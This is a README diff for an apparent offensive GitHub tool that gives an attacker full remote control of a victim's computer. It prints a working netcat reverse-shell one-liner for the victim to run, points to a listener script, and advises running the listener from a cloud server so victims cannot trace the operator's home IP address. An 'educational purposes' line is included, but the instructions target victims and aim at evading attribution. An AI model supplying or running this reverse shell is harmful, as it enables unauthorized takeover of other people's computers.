Hirukshacoder/T-Tools-advanced--cyber-security/README.md

 * Guidlines

-> Always use a cloud linux machine or another os in the cloud, because when the victim type the command he can grab your home network ip.
+* Always use a cloud linux machine or another os in the cloud, because when the victim type the command he can grab your home network ip.

-> And this tool is only for educational purposes.
+* And this tool is only for educational purposes.

+* This tool can take the full control of the computer.

+* Another thing is that you can start listening on any port.

+* Also you have to add your ip to the net.py as well as the victim's command.

+* And you can use linode, aws or google cloud services to make your cloud machine.

     kali@attacker ~ $ python3 listen.py
     kali@victim ~ $ mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc <add your ip> 9999 >/tmp/f